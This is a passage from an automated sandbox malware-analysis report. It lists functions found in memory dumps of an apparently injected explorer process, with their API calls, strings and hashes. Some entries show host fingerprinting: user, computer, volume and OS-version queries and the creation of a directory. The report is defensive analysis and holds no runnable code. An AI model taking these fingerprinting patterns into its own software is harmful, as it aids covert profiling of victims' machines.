                                                                                                                                                                                                                                                    • API String ID: 3838066056-3888052004
                                                                                                                                                                                                                                                    • Opcode ID: 749449a22ef72b4327b6793e58f92429f308b4eecf308e11f9d084161f211034
                                                                                                                                                                                                                                                    • Instruction ID: fc450a3f1b93028c927e09f3e2a7081204f23c95249c19e88bd1bbdeea619499
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 749449a22ef72b4327b6793e58f92429f308b4eecf308e11f9d084161f211034
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B119B31308B8582DE04DB1AE85035AA361F788BE4F4C8521DA6D97BE8DF7CC945C741
                                                                                                                                                                                                                                                    Function 0E8AB8B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0E8AB8C9
                                                                                                                                                                                                                                                      • Part of subcall function 0E8AD0B0: std::_Lockit::_Lockit.LIBCPMT ref: 0E8AD0C6
                                                                                                                                                                                                                                                      • Part of subcall function 0E8AD0B0: std::_Lockit::~_Lockit.LIBCPMT ref: 0E8AD0E9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0E8AB92E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0E8AB938
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0E8AB95C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8AB96D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: le32Next
                                                                                                                                                                                                                                                    • API String ID: 3838066056-3888052004
                                                                                                                                                                                                                                                    • Opcode ID: 3f2cfd346f00936d1d0ceca0f1e07b3d9d9985527677f1b629d1e8123c28af09
                                                                                                                                                                                                                                                    • Instruction ID: c55a0f44de8744300cccb2cefc6ece4a05c39a13e31d11a524e5b464933fa36f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f2cfd346f00936d1d0ceca0f1e07b3d9d9985527677f1b629d1e8123c28af09
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4118631308B8482DE10DB16E45039EA361F788BE4F4C86259A9D87BE8EF7CC905C741
                                                                                                                                                                                                                                                    Function 10D6E570 Relevance: 10.5, APIs: 7, Instructions: 45stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 10D6E450: GetWindowsDirectoryA.KERNEL32 ref: 10D6E49C
                                                                                                                                                                                                                                                      • Part of subcall function 10D6E450: GetVolumeInformationA.KERNEL32 ref: 10D6E4E6
                                                                                                                                                                                                                                                      • Part of subcall function 10D6E450: wsprintfA.USER32 ref: 10D6E547
                                                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32 ref: 10D6E5C3
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 10D6E5D3
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 10D6E5E1
                                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32 ref: 10D6E5EC
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 10D6E5FC
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 10D6E60A
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 10D6E61A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 943468954-0
                                                                                                                                                                                                                                                    • Opcode ID: 04a498f69f8cc2775bfd862595e1a9677f839e62d371c7e6f807f8f95e64d71f
                                                                                                                                                                                                                                                    • Instruction ID: 03c02ad7fd9acaaa43780238f6f405ff180c43914de4c8e97b7bf6456934ac41
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04a498f69f8cc2775bfd862595e1a9677f839e62d371c7e6f807f8f95e64d71f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66110D76625B4182EB44DFA5F86579A73A1FB8DB94F043026EECA47728DE7CC094CB00
                                                                                                                                                                                                                                                    Function 0F4AE570 Relevance: 10.5, APIs: 7, Instructions: 45stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0F4AE450: GetWindowsDirectoryA.KERNEL32 ref: 0F4AE49C
                                                                                                                                                                                                                                                      • Part of subcall function 0F4AE450: GetVolumeInformationA.KERNEL32 ref: 0F4AE4E6
                                                                                                                                                                                                                                                      • Part of subcall function 0F4AE450: wsprintfA.USER32 ref: 0F4AE547
                                                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32 ref: 0F4AE5C3
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0F4AE5D3
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0F4AE5E1
                                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32 ref: 0F4AE5EC
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0F4AE5FC
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0F4AE60A
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0F4AE61A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 943468954-0
                                                                                                                                                                                                                                                    • Opcode ID: 04a498f69f8cc2775bfd862595e1a9677f839e62d371c7e6f807f8f95e64d71f
                                                                                                                                                                                                                                                    • Instruction ID: bf286abbbac29e80b3ce5da8b80f46bd61bfb37334ce9c92cb25893db05c6bfa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04a498f69f8cc2775bfd862595e1a9677f839e62d371c7e6f807f8f95e64d71f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66112E35215B4281EB60DF65F8547AF73A1F78DBA0F4460369E8B47B18DE7CC0589B00
                                                                                                                                                                                                                                                    Function 0E8FE570 Relevance: 10.5, APIs: 7, Instructions: 45stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FE450: GetWindowsDirectoryA.KERNEL32 ref: 0E8FE49C
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FE450: GetVolumeInformationA.KERNEL32 ref: 0E8FE4E6
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FE450: wsprintfA.USER32 ref: 0E8FE547
                                                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32 ref: 0E8FE5C3
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0E8FE5D3
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0E8FE5E1
                                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32 ref: 0E8FE5EC
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0E8FE5FC
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0E8FE60A
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0E8FE61A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 943468954-0
                                                                                                                                                                                                                                                    • Opcode ID: 04a498f69f8cc2775bfd862595e1a9677f839e62d371c7e6f807f8f95e64d71f
                                                                                                                                                                                                                                                    • Instruction ID: 1ed5ed8718116304d1aad92450b3bd4dd747e89e6b6fac90555ac985d123d82d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04a498f69f8cc2775bfd862595e1a9677f839e62d371c7e6f807f8f95e64d71f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3011FB76325B8192EF44DF25F854B1AB3B5FB8DB90F44242ADA8A57728DE3CC0548B00
                                                                                                                                                                                                                                                    Function 0C35C350 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0C35C362
                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0C35C3A8
                                                                                                                                                                                                                                                      • Part of subcall function 0C36AAEC: setlocale.LIBCMT ref: 0C36AB00
                                                                                                                                                                                                                                                      • Part of subcall function 0C36AAEC: _Yarn.LIBCPMT ref: 0C36AB1A
                                                                                                                                                                                                                                                      • Part of subcall function 0C36AAEC: setlocale.LIBCMT ref: 0C36AB29
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0C35C3C7
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C35C3D8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • uleHandleW, xrefs: 0C35C3CC
                                                                                                                                                                                                                                                    • regex_error(error_range): The expression contained an invalid character range, such as [b-a] in most encodings., xrefs: 0C35C3BB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: regex_error(error_range): The expression contained an invalid character range, such as [b-a] in most encodings.$uleHandleW
                                                                                                                                                                                                                                                    • API String ID: 409252694-1841763866
                                                                                                                                                                                                                                                    • Opcode ID: b8edf2e0ca0d91ae1cb0a1f28954578e40840cfd34bd722e3cabd4d5fc259337
                                                                                                                                                                                                                                                    • Instruction ID: ae6f5e0040c1dd86b20ef5a2e143adcaa0ff21d156c631eddbfbd89230a2ca72
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8edf2e0ca0d91ae1cb0a1f28954578e40840cfd34bd722e3cabd4d5fc259337
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0676233054491CB15EF25E9545DCE326FB9478CFC880219F4D47969EF34C94DCB51
                                                                                                                                                                                                                                                    Function 0A02C350 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0A02C362
                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0A02C3A8
                                                                                                                                                                                                                                                      • Part of subcall function 0A03AAEC: setlocale.LIBCMT ref: 0A03AB00
                                                                                                                                                                                                                                                      • Part of subcall function 0A03AAEC: _Yarn.LIBCPMT ref: 0A03AB1A
                                                                                                                                                                                                                                                      • Part of subcall function 0A03AAEC: setlocale.LIBCMT ref: 0A03AB29
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0A02C3C7
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A02C3D8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • regex_error(error_range): The expression contained an invalid character range, such as [b-a] in most encodings., xrefs: 0A02C3BB
                                                                                                                                                                                                                                                    • uleHandleW, xrefs: 0A02C3CC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: regex_error(error_range): The expression contained an invalid character range, such as [b-a] in most encodings.$uleHandleW
                                                                                                                                                                                                                                                    • API String ID: 409252694-1841763866
                                                                                                                                                                                                                                                    • Opcode ID: b8edf2e0ca0d91ae1cb0a1f28954578e40840cfd34bd722e3cabd4d5fc259337
                                                                                                                                                                                                                                                    • Instruction ID: 523c6c8dfe8c02f1810d12d592074e2b0782ae8d540930bc53b6939f68556f3d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8edf2e0ca0d91ae1cb0a1f28954578e40840cfd34bd722e3cabd4d5fc259337
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46F0FB62310A5C90EF14FF25D9A01EDA32AFB95BC8FC44021DB4E4656AEF34C946C750
                                                                                                                                                                                                                                                    Function 0E8AC350 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0E8AC362
                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0E8AC3A8
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BAAEC: setlocale.LIBCMT ref: 0E8BAB00
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BAAEC: _Yarn.LIBCPMT ref: 0E8BAB1A
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BAAEC: setlocale.LIBCMT ref: 0E8BAB29
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0E8AC3C7
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8AC3D8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • regex_error(error_range): The expression contained an invalid character range, such as [b-a] in most encodings., xrefs: 0E8AC3BB
                                                                                                                                                                                                                                                    • uleHandleW, xrefs: 0E8AC3CC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: regex_error(error_range): The expression contained an invalid character range, such as [b-a] in most encodings.$uleHandleW
                                                                                                                                                                                                                                                    • API String ID: 409252694-1841763866
                                                                                                                                                                                                                                                    • Opcode ID: b8edf2e0ca0d91ae1cb0a1f28954578e40840cfd34bd722e3cabd4d5fc259337
                                                                                                                                                                                                                                                    • Instruction ID: 66b5077d4ed8ecaca80d49a0b138a94ad14979891af93c496e52190079adbc64
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8edf2e0ca0d91ae1cb0a1f28954578e40840cfd34bd722e3cabd4d5fc259337
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FF08662310D4452DB14FF69D9501ADA36AEB947C4FD88821870DC7669EF34CD56C351
                                                                                                                                                                                                                                                    Function 10D83154 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction ID: 9c2e54f2026d25cc6342dd73525fa4e7d139bd0d04c0cd23f8871fbe6d3105c4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3E0127A500244DBC7551B61800939C3660FBD8F49F9AD567D75807364CBBC59848A62
                                                                                                                                                                                                                                                    Function 0F4C3154 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction ID: 8288238a4199c130da2ea7f0182a2cc418d3ae01864500a0f0cf74512116e9fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3EE0C93E504244DAC6A52F6680043BD2660E798F05F8AF57F8E5447302DBBC55818AD2
                                                                                                                                                                                                                                                    Function 0C372554 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction ID: 092d7f1000cc6fcee5693005788f0e6b115708b29bd14d106253b0682e3d7ae6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59E09276630148C7D7396B6080943ED3270F78C715F96C7619A4453700C7BE44888E13
                                                                                                                                                                                                                                                    Function 0E913154 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction ID: 304265dd313a0663b4a900db5090f1dc3fd5339edc35280c54cef156f68eea2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AEE01A3A61018CDAC729AB6580053AD36F4FBD8B06F8BD9E5865447300C7BD4DC08F62
                                                                                                                                                                                                                                                    Function 0A042554 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction ID: 662fc82b320e3941783eb11037cdad74c42db4b8be1a239ac26318255df07504
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DE0C2FAB2014CDBC6656F6480143EC2AA4FBDCB06F869571EB9456301C7BC46918E52
                                                                                                                                                                                                                                                    Function 0E8C2554 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction ID: 9148280b6c540bbc2103fbcb89aefdc58b342176628073007f9ffbfbaab8460d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33E06D36624504C7C7656BE884143AD32A0F78EB05F86C9698650C73A4D7BCCC828A13
                                                                                                                                                                                                                                                    Function 10D74B50 Relevance: 9.1, APIs: 6, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32 ref: 10D74C09
                                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32 ref: 10D74C23
                                                                                                                                                                                                                                                      • Part of subcall function 10D6EA80: WideCharToMultiByte.KERNEL32 ref: 10D6EAC3
                                                                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32 ref: 10D74C4C
                                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32 ref: 10D74C5D
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 10D74CA3
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: EnterCriticalSection.KERNEL32 ref: 10D688D8
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: RtlInitializeCriticalSection.NTDLL ref: 10D688E5
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: lstrcpyA.KERNEL32 ref: 10D6891A
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: lstrcpyA.KERNEL32 ref: 10D6893D
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: lstrcatA.KERNEL32 ref: 10D6894D
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: lstrcatA.KERNEL32 ref: 10D6895D
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: LeaveCriticalSection.KERNEL32 ref: 10D689E4
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: memcpy.MSVCRT ref: 10D689FC
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: lstrlenA.KERNEL32 ref: 10D68A0A
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 10D74CB7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2800961625-0
